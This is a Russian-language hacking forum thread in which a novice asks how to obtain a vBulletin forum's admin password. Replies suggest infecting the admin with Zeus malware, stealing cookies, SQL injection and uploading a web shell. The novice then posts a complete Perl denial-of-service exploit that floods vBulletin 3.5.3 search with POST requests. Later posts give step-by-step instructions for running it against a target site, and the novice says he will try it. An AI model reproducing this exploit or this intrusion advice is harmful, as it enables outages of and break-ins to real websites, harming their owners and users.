Взлом vBulletin
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом vBulletin - 2010-05-25 18:06:51.033333
|
|
|
Jalsomino
Сообщений: 9
Оценки: 0
Присоединился: 2010-05-25 18:04:53.373333
|
Получить пароль от админки…Подскажите с чего начать?
|
|
|
RE: Взлом vBulletin - 2010-05-25 18:11:42.910000
|
|
|
EXTRACTION
Сообщений: 229
Оценки: 0
Присоединился: 2010-03-27 16:55:04.493333
|
Способов уйма, угостить админа зевсом, украсть куки, найти на форуме MySQL Injection. Определись сам в каком направлениии тебе действовать
|
|
|
RE: Взлом vBulletin - 2010-05-25 18:13:45.653333
|
|
|
Jalsomino
Сообщений: 9
Оценки: 0
Присоединился: 2010-05-25 18:04:53.373333
|
расскажи поподробнее о то что такое 1)админа зевсом, 2)украсть куки, 3)найти на форуме MySQL Injection
|
|
|
RE: Взлом vBulletin - 2010-05-25 18:27:43.436666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
vBulletin 3.5.3 Search DoS Exploit - Уязвимость http://www.google.com/search?client=opera&rls=ru&q=vBulletin+3.5.3+Search+DoS+Exploit&sourceid=opera&ie=utf-8&oe=utf-8
Можно найти sql-инъекцию, там и будет логин и пароль админа. Как это сайт с поддержкой php, то можно найти php-инклюд и залить шелл. Через sql-инъекцию можно тоже залить шелл Лучше начать с изучения sql-инъекции, php-инклюда, а потом залитие шелла на сервер через sql, php инъекции ЗЫ: я так и научился взламывать сайты :)
|
|
|
RE: Взлом vBulletin - 2010-05-26 12:06:13.196666
|
|
|
Jalsomino
Сообщений: 9
Оценки: 0
Присоединился: 2010-05-25 18:04:53.373333
|
дайте кто то ISQ Alex.Black или EXTRACTION
|
|
|
RE: Взлом vBulletin - 2010-05-26 12:09:45.246666
|
|
|
Jalsomino
Сообщений: 9
Оценки: 0
Присоединился: 2010-05-25 18:04:53.373333
|
нашел по вашей ссылке http://hacker-pro.net/bugs/index.php?nid=146 Эксплоит: #!/usr/bin/perl
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################
print q{
____________________________________________________________________________
____ ____ ____ ____ _ __ ____ ____ _ __ ____ _____ ____ __ ___
/ __// __//_ // __// |/ // __// _// |/ // __/ / ___// __ / |/ /
_ / _/ / // _/ / /_ _/ / / /_ _ / /__ / /_/ // /|_/ /
/___//___/ /_//___//_/|_//___//___//_/|_//___/(_)___/ ____//_/ /_/
____________________________________________________________________________
};
use IO::Socket;
$server= $ARGV[0];
$path=$ARGV[1];
while($x != 9999)
{
$post =
"search_keywords=Se7enSins+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=ms
gonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
$lrg = length $post;
if(!$server||!$path)
{
print " vBulletin DoS by spic of g00ns nn";
print " Exploit code found on Se7enSins.com nn";
print " n00bFRAGGER was here... nn";
print " usage: VBDoS.pl <host without http> <directory> nn";
exit();
}
my $sock = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;
print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n";
print $sock "Host: $servern";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servern";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20050511 Firefox/1.0.5n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postn";
close($sock);
syswrite STDOUT,".";
$x++;
}
########################################## расскажите как его юзать?
|
|
|
RE: Взлом vBulletin - 2010-05-26 12:11:26.746666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
########################################## # Example # vBdos.pl www.avbforum.com /vbulletin/ ##########################################
|
|
|
RE: Взлом vBulletin - 2010-05-26 12:14:48.650000
|
|
|
Jalsomino
Сообщений: 9
Оценки: 0
Присоединился: 2010-05-25 18:04:53.373333
|
сори но не понял[sm=ah.gif]
|
|
|
RE: Взлом vBulletin - 2010-05-26 12:20:46.833333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
качаешь ActivePerl устанавливаешь, открываешь командную строку и пишешь туда vBdos.pl www.avbforum.com /vbulletin/ где vBdos.pl - эксплоит
|
|
|
RE: Взлом vBulletin - 2010-05-26 12:23:10.896666
|
|
|
Jalsomino
Сообщений: 9
Оценки: 0
Присоединился: 2010-05-25 18:04:53.373333
|
спс, ща попробую…
|
|
|
|
|